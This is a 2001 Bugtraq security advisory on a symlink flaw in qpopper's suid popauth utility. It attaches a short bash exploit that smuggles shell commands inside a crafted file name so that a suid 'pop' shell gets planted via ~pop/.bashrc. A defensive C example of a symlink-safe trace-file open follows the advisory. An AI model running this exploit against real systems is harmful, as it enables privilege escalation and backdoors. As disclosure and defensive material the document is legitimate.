[23542] in bugtraq
Advisory: popauth
daemon@ATHENA.MIT.EDU (Paul Starzetz)
Mon Dec 17 22:41:07 2001
Message-ID: <3C1E775E.8E79F626@starzetz.de>
Date: Mon, 17 Dec 2001 23:53:18 +0100
From: Paul Starzetz <paul@starzetz.de>
MIME-Version: 1.0
To: "bugtraq@securityfocus.com" <bugtraq@securityfocus.com>
Hi,
there is a symlink problem in the popauth utility, which is part of the qpopper package. The binary is often installed suid pop and follows symlinks in the -trace file option.
This problem has been reported to vendors in June 2001.
Impact: in case of suid popauth and a valid shell for user pop, the attached script will create a suid-pop shell if someone does su to pop. This may happen as part of some automated check script (startup script).

This vulnerability is not very crucial; however, it should be reported at least once.
/ih
Attachment: mkbs2.sh (application/x-sh)
#!/bin/bash
# popauth symlink follow vuln by IhaQueR
# this will create .bashrc for user pop
# and ~pop/sup suid shell
FILE=$(perl -e 'print "/tmp/blah1\"\ncd ~\necho >blah.c \"#include <stdio.h>\nmain(){setreuid(geteuid(),getuid());execlp(\\\"bash\\\", \\\"bash\\\",NULL);}\"\ngcc blah.c -o sup\nchmod u+s sup\necho done\n\n\""')
ln -s /var/lib/pop/.bashrc "$FILE"
/usr/sbin/popauth -trace "$FILE"
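The bug above is the classic setuid failure: a user-named file is opened with the suid owner's privileges and the path is followed through a symlink. The following C is an added example, not popauth's own code and assuming nothing about its internals; it shows how a setuid program should open a caller-supplied trace file (drop to the real uid for the open, refuse symlinks with O_NOFOLLOW) and checks itself against a symlink constructed in a temp directory.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Open a user-named trace file from a setuid program: drop to the real
 * (invoking) uid for the open so the caller's own permissions apply, and
 * refuse symlinks with O_NOFOLLOW. Returns an fd, or -1 with errno set
 * (ELOOP when the final path component is a symlink). */
int open_trace_file(const char *path)
{
    uid_t saved_euid = geteuid();
    if (seteuid(getuid()) != 0)          /* drop privileges for the open */
        return -1;
    int fd = open(path, O_WRONLY | O_CREAT | O_APPEND | O_NOFOLLOW, 0600);
    int saved_errno = errno;
    if (seteuid(saved_euid) != 0) {      /* restore; treat failure as fatal */
        if (fd >= 0) close(fd);
        return -1;
    }
    errno = saved_errno;
    return fd;
}

/* Self-check in a fresh temp dir (constructed for this example): a plain
 * path must open, a symlink to another file must be refused with ELOOP. */
int trace_open_selfcheck(void)
{
    char dir[] = "/tmp/trace-demo-XXXXXX";
    if (mkdtemp(dir) == NULL) return 0;
    char plain[256], link[256], target[256];
    snprintf(plain, sizeof plain, "%s/trace.log", dir);
    snprintf(target, sizeof target, "%s/victim.rc", dir);
    snprintf(link, sizeof link, "%s/evil-trace", dir);
    int ok = 0, fd = open_trace_file(plain);
    if (fd >= 0) { close(fd); ok = 1; }
    if (ok && symlink(target, link) == 0) {
        fd = open_trace_file(link);
        ok = (fd < 0 && errno == ELOOP); /* refused, target not created */
        if (fd >= 0) close(fd);
        unlink(link); unlink(target);
    } else ok = 0;
    unlink(plain); rmdir(dir);
    return ok;
}

int main(void)
{ printf("symlink-safe trace open: %s\n", trace_open_selfcheck() ? "ok" : "FAILED"); return 0; }
```

O_NOFOLLOW only protects the last path component, which is why the example also drops privileges before the open; a symlinked parent directory is then caught by ordinary permission checks.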